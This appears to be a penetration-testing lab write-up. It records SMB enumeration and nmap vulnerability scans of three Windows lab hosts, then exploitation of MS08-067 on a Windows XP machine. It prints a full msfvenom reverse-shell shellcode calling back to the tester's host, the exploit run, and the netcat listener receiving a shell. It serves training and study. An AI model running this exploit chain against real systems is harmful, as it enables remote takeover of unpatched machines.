Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 20 01:01:31 2019

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.50.97.5
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ================================================== 
|    Enumerating Workgroup/Domain on 10.50.97.5    |
 ================================================== 
[V] Attempting to get domain name with command: nmblookup -A '10.50.97.5'
[+] Got domain/workgroup name: WORKGROUP

 ========================================== 
|    Nbtstat Information for 10.50.97.5    |
 ========================================== 
Looking up status of 10.50.97.5
	ELS-WINXP        -         B   Workstation Service
	WORKGROUP        -  B   Domain/Workgroup Name
	ELS-WINXP        -         B   File Server Service
	WORKGROUP        -  B   Browser Service Elections

	MAC Address = 00-50-56-A1-38-43

 =================================== 
|    Session Check on 10.50.97.5    |
 =================================== 
[V] Attempting to make null session using command: smbclient -W 'WORKGROUP' //'10.50.97.5'/ipc$ -U''%'' -c 'help' 2>&1
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

No luck, nor for hosts 8 and 14:

root@Kali:~# enum4linux -a -v 10.50.97.8
[V] Dependent program "nmblookup" found in /usr/bin/nmblookup
[V] Dependent program "net" found in /usr/bin/net
[V] Dependent program "rpcclient" found in /usr/bin/rpcclient
[V] Dependent program "smbclient" found in /usr/bin/smbclient
[V] Dependent program "polenum" found in /usr/bin/polenum
[V] Dependent program "ldapsearch" found in /usr/bin/ldapsearch
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 20 01:03:32 2019

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.50.97.8
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ================================================== 
|    Enumerating Workgroup/Domain on 10.50.97.8    |
 ================================================== 
[V] Attempting to get domain name with command: nmblookup -A '10.50.97.8'
[+] Got domain/workgroup name: WORKGROUP

 ========================================== 
|    Nbtstat Information for 10.50.97.8    |
 ========================================== 
Looking up status of 10.50.97.8
	ELS-WINSER2003   -         B   Workstation Service
	WORKGROUP        -  B   Domain/Workgroup Name
	ELS-WINSER2003   -         B   File Server Service
	WORKGROUP        -  B   Browser Service Elections
	WORKGROUP        -         B   Master Browser
	..__MSBROWSE__.  -  B   Master Browser

	MAC Address = 00-50-56-A1-BF-DB

 =================================== 
|    Session Check on 10.50.97.8    |
 =================================== 
[V] Attempting to make null session using command: smbclient -W 'WORKGROUP' //'10.50.97.8'/ipc$ -U''%'' -c 'help' 2>&1
[+] Server 10.50.97.8 allows sessions using username '', password ''

 ========================================= 
|    Getting domain SID for 10.50.97.8    |
 ========================================= 
[V] Attempting to get domain SID with command: rpcclient -W 'WORKGROUP' -U''%'' 10.50.97.8 -c 'lsaquery' 2>&1
Cannot connect to server.  Error was NT_STATUS_INVALID_PARAMETER
[+] Can't determine if host is part of domain or part of a workgroup

 ==================================== 
|    OS information on 10.50.97.8    |
 ==================================== 
[V] Attempting to get OS info with command: smbclient -W 'WORKGROUP' //'10.50.97.8'/ipc$ -U''%'' -c 'q' 2>&1
[+] Got OS info for 10.50.97.8 from smbclient: Domain=[ELS-WINSER2003] OS=[Windows Server 2003 3790 Service Pack 1] Server=[Windows Server 2003 5.2]
[V] Attempting to get OS info with command: rpcclient -W 'WORKGROUP' -U''%'' -c 'srvinfo' '10.50.97.8' 2>&1
[+] Got OS info for 10.50.97.8 from srvinfo:
Cannot connect to server.  Error was NT_STATUS_INVALID_PARAMETER

 =========================== 
|    Users on 10.50.97.8    |
 =========================== 
[V] Attempting to get userlist with command: rpcclient -W 'WORKGROUP' -c querydispinfo -U''%'' '10.50.97.8' 2>&1
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

[V] Attempting to get userlist with command: rpcclient -W 'WORKGROUP' -c enumdomusers -U''%'' '10.50.97.8' 2>&1
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ======================================= 
|    Share Enumeration on 10.50.97.8    |
 ======================================= 
[V] Attempting to get share list using authentication
[E] Can't list shares: NT_STATUS_ACCESS_DENIED

[+] Attempting to map shares on 10.50.97.8

 ================================================== 
|    Password Policy Information for 10.50.97.8    |
 ================================================== 
[V] Attempting to get Password Policy info with command: polenum '':''@'10.50.97.8' 2>&1
[E] Unexpected error from polenum:


[+] Attaching to 10.50.97.8 using a NULL share

[+] Trying protocol 445/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

[+] Trying protocol 139/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

[V] Attempting to get Password Policy info with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c "getdompwinfo" 2>&1

[+] Retieved partial password policy with rpcclient:
 ============================ 
|    Groups on 10.50.97.8    |
 ============================ 
[V] Getting builtin groups with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'enumalsgroups builtin' 2>&1

[+] Getting builtin groups:

[+] Getting builtin group memberships:
[V] Getting local groups with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'enumalsgroups domain' 2>&1

[+] Getting local groups:

[+] Getting local group memberships:
[V] Getting domain groups with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c "enumdomgroups" 2>&1

[+] Getting domain groups:

[+] Getting domain group memberships:

 ===================================================================== 
|    Users on 10.50.97.8 via RID cycling (RIDS: 500-550,1000-1050)    |
 ===================================================================== 
[V] Attempting to get SID from 10.50.97.8 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'lookupnames administrator' 2>&1
[V] Assuming that user "administrator" exists
[V] Attempting to get SID from 10.50.97.8 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'lookupnames guest' 2>&1
[V] Assuming that user "guest" exists
[V] Attempting to get SID from 10.50.97.8 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'lookupnames krbtgt' 2>&1
[V] Assuming that user "krbtgt" exists
[V] Attempting to get SID from 10.50.97.8 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'lookupnames domain admins' 2>&1
[V] Assuming that user "domain admins" exists
[V] Attempting to get SID from 10.50.97.8 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'lookupnames root' 2>&1
[V] Assuming that user "root" exists
[V] Attempting to get SID from 10.50.97.8 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'lookupnames bin' 2>&1
[V] Assuming that user "bin" exists
[V] Attempting to get SID from 10.50.97.8 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'lookupnames none' 2>&1
[V] Assuming that user "none" exists
[V] Attempting to get SIDs from 10.50.97.8 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c lsaenumsid 2>&1

 =========================================== 
|    Getting printer info for 10.50.97.8    |
 =========================================== 
[V] Attempting to get printer info with command: rpcclient -W 'WORKGROUP' -U''%'' -c 'enumprinters' '10.50.97.8' 2>&1
Cannot connect to server.  Error was NT_STATUS_INVALID_PARAMETER

enum4linux complete on Wed Feb 20 01:04:05 2019


root@Kali:~# enum4linux -a -v 10.50.97.14
[V] Dependent program "nmblookup" found in /usr/bin/nmblookup
[V] Dependent program "net" found in /usr/bin/net
[V] Dependent program "rpcclient" found in /usr/bin/rpcclient
[V] Dependent program "smbclient" found in /usr/bin/smbclient
[V] Dependent program "polenum" found in /usr/bin/polenum
[V] Dependent program "ldapsearch" found in /usr/bin/ldapsearch
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 20 01:05:14 2019

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.50.97.14
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 =================================================== 
|    Enumerating Workgroup/Domain on 10.50.97.14    |
 =================================================== 
[V] Attempting to get domain name with command: nmblookup -A '10.50.97.14'
[+] Got domain/workgroup name: WORKGROUP

 =========================================== 
|    Nbtstat Information for 10.50.97.14    |
 =========================================== 
Looking up status of 10.50.97.14
	ELS-WIN03        -         B   Workstation Service
	WORKGROUP        -  B   Domain/Workgroup Name
	ELS-WIN03        -         B   File Server Service
	WORKGROUP        -  B   Browser Service Elections

	MAC Address = 00-50-56-A1-3F-53

 ==================================== 
|    Session Check on 10.50.97.14    |
 ==================================== 
[V] Attempting to make null session using command: smbclient -W 'WORKGROUP' //'10.50.97.14'/ipc$ -U''%'' -c 'help' 2>&1
[+] Server 10.50.97.14 allows sessions using username '', password ''

 ========================================== 
|    Getting domain SID for 10.50.97.14    |
 ========================================== 
[V] Attempting to get domain SID with command: rpcclient -W 'WORKGROUP' -U''%'' 10.50.97.14 -c 'lsaquery' 2>&1
Cannot connect to server.  Error was NT_STATUS_INVALID_PARAMETER
[+] Can't determine if host is part of domain or part of a workgroup

 ===================================== 
|    OS information on 10.50.97.14    |
 ===================================== 
[V] Attempting to get OS info with command: smbclient -W 'WORKGROUP' //'10.50.97.14'/ipc$ -U''%'' -c 'q' 2>&1
[+] Got OS info for 10.50.97.14 from smbclient: Domain=[ELS-WIN03] OS=[Windows Server 2003 3790 Service Pack 1] Server=[Windows Server 2003 5.2]
[V] Attempting to get OS info with command: rpcclient -W 'WORKGROUP' -U''%'' -c 'srvinfo' '10.50.97.14' 2>&1
[+] Got OS info for 10.50.97.14 from srvinfo:
Cannot connect to server.  Error was NT_STATUS_INVALID_PARAMETER

 ============================ 
|    Users on 10.50.97.14    |
 ============================ 
[V] Attempting to get userlist with command: rpcclient -W 'WORKGROUP' -c querydispinfo -U''%'' '10.50.97.14' 2>&1
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

[V] Attempting to get userlist with command: rpcclient -W 'WORKGROUP' -c enumdomusers -U''%'' '10.50.97.14' 2>&1
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ======================================== 
|    Share Enumeration on 10.50.97.14    |
 ======================================== 
[V] Attempting to get share list using authentication
[E] Can't list shares: NT_STATUS_ACCESS_DENIED

[+] Attempting to map shares on 10.50.97.14

 =================================================== 
|    Password Policy Information for 10.50.97.14    |
 =================================================== 
[V] Attempting to get Password Policy info with command: polenum '':''@'10.50.97.14' 2>&1
[E] Unexpected error from polenum:


[+] Attaching to 10.50.97.14 using a NULL share

[+] Trying protocol 445/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

[+] Trying protocol 139/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

[V] Attempting to get Password Policy info with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c "getdompwinfo" 2>&1

[+] Retieved partial password policy with rpcclient:
 ============================= 
|    Groups on 10.50.97.14    |
 ============================= 
[V] Getting builtin groups with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'enumalsgroups builtin' 2>&1

[+] Getting builtin groups:

[+] Getting builtin group memberships:
[V] Getting local groups with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'enumalsgroups domain' 2>&1

[+] Getting local groups:

[+] Getting local group memberships:
[V] Getting domain groups with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c "enumdomgroups" 2>&1

[+] Getting domain groups:

[+] Getting domain group memberships:

 ====================================================================== 
|    Users on 10.50.97.14 via RID cycling (RIDS: 500-550,1000-1050)    |
 ====================================================================== 
[V] Attempting to get SID from 10.50.97.14 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'lookupnames administrator' 2>&1
[V] Assuming that user "administrator" exists
[V] Attempting to get SID from 10.50.97.14 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'lookupnames guest' 2>&1
[V] Assuming that user "guest" exists
[V] Attempting to get SID from 10.50.97.14 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'lookupnames krbtgt' 2>&1
[V] Assuming that user "krbtgt" exists
[V] Attempting to get SID from 10.50.97.14 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'lookupnames domain admins' 2>&1
[V] Assuming that user "domain admins" exists
[V] Attempting to get SID from 10.50.97.14 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'lookupnames root' 2>&1
[V] Assuming that user "root" exists
[V] Attempting to get SID from 10.50.97.14 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'lookupnames bin' 2>&1
[V] Assuming that user "bin" exists
[V] Attempting to get SID from 10.50.97.14 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'lookupnames none' 2>&1
[V] Assuming that user "none" exists
[V] Attempting to get SIDs from 10.50.97.14 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c lsaenumsid 2>&1

 ============================================ 
|    Getting printer info for 10.50.97.14    |
 ============================================ 
[V] Attempting to get printer info with command: rpcclient -W 'WORKGROUP' -U''%'' -c 'enumprinters' '10.50.97.14' 2>&1
Cannot connect to server.  Error was NT_STATUS_INVALID_PARAMETER

enum4linux complete on Wed Feb 20 01:05:46 2019

So no null session vulnerability. I then tried all the nmap SMB scripts, but after one hour the scan still wasn’t done, so I aborted.

root@Kali:~/PTP/2.5_Exploitation/Lab 4# nmap -sV -Pn -n --script=smb* 10.50.97.5,8,14
Stats: 1:07:43 elapsed; 0 hosts completed (3 up), 3 undergoing Script Scan
NSE Timing: About 89.80% done; ETC: 01:42 (0:05:19 remaining)

Finally I decided on an approach which yielded something: run only the nmap vuln scripts.

root@Kali:~/PTP/2.5_Exploitation/Lab 4# nmap -Pn -n --script vuln 10.50.97.5,8,14

Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-20 20:07 +08
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.50.97.5
Host is up (0.25s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap scan report for 10.50.97.8
Host is up (0.25s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
3389/tcp open  ms-wbt-server
| rdp-vuln-ms12-020: 
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|   
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap scan report for 10.50.97.14
Host is up (0.25s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
3389/tcp open  ms-wbt-server
| rdp-vuln-ms12-020: 
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|   
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 3 IP addresses (3 hosts up) scanned in 700.95 seconds

Finally. The lab said to start with host 5; now we know why. It's vulnerable to the infamous MS08-067 exploit. Now the remainder would be easy if we used Metasploit, but let's avoid that. So I searched for an MS08-067 exploit online which I could use and stumbled on this via this incredible HTB write-up, which I referenced earlier for the manual EternalBlue post.

First we need to generate our payload, using msfvenom. Note that the parameters for msfvenom were taken from comments in the exploit. I assume Win XP was mostly 32-bit, but in reality I should have run the smb-os-discovery script first; I will do that later.

root@Kali:~/PTP/2.5_Exploitation/Lab 4# msfvenom -p windows/shell_reverse_tcp LHOST=172.16.5.50 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1488 bytes
unsigned char buf[] = 
"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x93\xf9\xe5\xe2\x83\xee\xfc\xe2\xf4\x6f\x11\x67\xe2\x93\xf9"
"\x85\x6b\x76\xc8\x25\x86\x18\xa9\xd5\x69\xc1\xf5\x6e\xb0\x87"
"\x72\x97\xca\x9c\x4e\xaf\xc4\xa2\x06\x49\xde\xf2\x85\xe7\xce"
"\xb3\x38\x2a\xef\x92\x3e\x07\x10\xc1\xae\x6e\xb0\x83\x72\xaf"
"\xde\x18\xb5\xf4\x9a\x70\xb1\xe4\x33\xc2\x72\xbc\xc2\x92\x2a"
"\x6e\xab\x8b\x1a\xdf\xab\x18\xcd\x6e\xe3\x45\xc8\x1a\x4e\x52"
"\x36\xe8\xe3\x54\xc1\x05\x97\x65\xfa\x98\x1a\xa8\x84\xc1\x97"
"\x77\xa1\x6e\xba\xb7\xf8\x36\x84\x18\xf5\xae\x69\xcb\xe5\xe4"
"\x31\x18\xfd\x6e\xe3\x43\x70\xa1\xc6\xb7\xa2\xbe\x83\xca\xa3"
"\xb4\x1d\x73\xa6\xba\xb8\x18\xeb\x0e\x6f\xce\x91\xd6\xd0\x93"
"\xf9\x8d\x95\xe0\xcb\xba\xb6\xfb\xb5\x92\xc4\x94\x06\x30\x5a"
"\x03\xf8\xe5\xe2\xba\x3d\xb1\xb2\xfb\xd0\x65\x89\x93\x06\x30"
"\xb2\xc3\xa9\xb5\xa2\xc3\xb9\xb5\x8a\x79\xf6\x3a\x02\x6c\x2c"
"\x72\x88\x96\x91\x49\xf2\x96\xcb\x8d\xe0\x93\xf8\x5e\x6b\x75"
"\x93\xf5\xb4\xc4\x91\x7c\x47\xe7\x98\x1a\x37\x16\x39\x91\xee"
"\x6c\xb7\xed\x97\x7f\x91\x15\x57\x31\xaf\x1a\x37\xfb\x9a\x88"
"\x86\x93\x70\x06\xb5\xc4\xae\xd4\x14\xf9\xeb\xbc\xb4\x71\x04"
"\x83\x25\xd7\xdd\xd9\xe3\x92\x74\xa1\xc6\x83\x3f\xe5\xa6\xc7"
"\xa9\xb3\xb4\xc5\xbf\xb3\xac\xc5\xaf\xb6\xb4\xfb\x80\x29\xdd"
"\x15\x06\x30\x6b\x73\xb7\xb3\xa4\x6c\xc9\x8d\xea\x14\xe4\x85"
"\x1d\x46\x42\x05\xff\xb9\xf3\x8d\x44\x06\x44\x78\x1d\x46\xc5"
"\xe3\x9e\x99\x79\x1e\x02\xe6\xfc\x5e\xa5\x80\x8b\x8a\x88\x93"
"\xaa\x1a\x37";

Now replace the payload in the Python exploit with the shellcode generated above. Before running the exploit we need to know exactly which OS we are dealing with. The usage text printed when the Python exploit is run on its own without arguments shows there are a total of 7 options to choose from, covering OS and language pack differences:

Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)

So let’s run smb-os-discovery

root@Kali:~/PTP/2.5_Exploitation/Lab 4# nmap -sV -Pn -n --script=smb-os-discovery 10.50.97.5,8,14
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-03 17:36 +08
Nmap scan report for 10.50.97.5
Host is up (0.25s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: els-winxp
|   NetBIOS computer name: ELS-WINXP\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-03-03T01:37:33-08:00

Nmap scan report for 10.50.97.8
Host is up (0.25s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2003 3790 Service Pack 1 microsoft-ds
1025/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2003 3790 Service Pack 1 (Windows Server 2003 5.2)
|   OS CPE: cpe:/o:microsoft:windows_server_2003::sp1
|   Computer name: els-winser2003
|   NetBIOS computer name: ELS-WINSER2003\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-03-03T01:37:33-08:00

Nmap scan report for 10.50.97.14
Host is up (0.25s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2003 3790 Service Pack 1 microsoft-ds
1025/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2003 3790 Service Pack 1 (Windows Server 2003 5.2)
|   OS CPE: cpe:/o:microsoft:windows_server_2003::sp1
|   Computer name: els-win03
|   NetBIOS computer name: ELS-WIN03\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-03-03T01:37:32-08:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (3 hosts up) scanned in 34.73 seconds

OK, so we know host 5 is Win XP English, but we still don't know which of the 3 XP options to choose; 1, 6 and 7 are valid choices. This is where it gets annoying. If you try an exploit and it fails, it will crash the NBT service and there's no way to try again without resetting the lab machine. I crashed it at least twice, maybe more (I don't remember), before it worked.

Option 6 turned out to be the correct one:

root@Kali:~/PTP/2.5_Exploitation/Lab 4# python ms08-067-edit.py 10.50.97.5 6 445
#######################################################################
#   MS08-067 Exploit
#   This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
#   Mod in 2018 by Andy Acer
#   - Added support for selecting a target port at the command line.
#   - Changed library calls to allow for establishing a NetBIOS session for SMB transport
#   - Changed shellcode handling to allow for variable length shellcode.
#######################################################################


$   This version requires the Python Impacket library version to 0_9_17 or newer.
$
$   Here's how to upgrade if necessary:
$
$   git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$   cd impacket
$   pip install .


#######################################################################

Windows XP SP3 English (NX)

[-]Initiating connection
[-]connected to ncacn_np:10.50.97.5[\pipe\browser]
Exploit finish

On our listener we have

root@Kali:~/PTP/2.5_Exploitation/Lab 4# nc -nlvp 443
listening on [any] 443 ...
connect to [172.16.5.50] from (UNKNOWN) [10.50.97.5] 1032
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


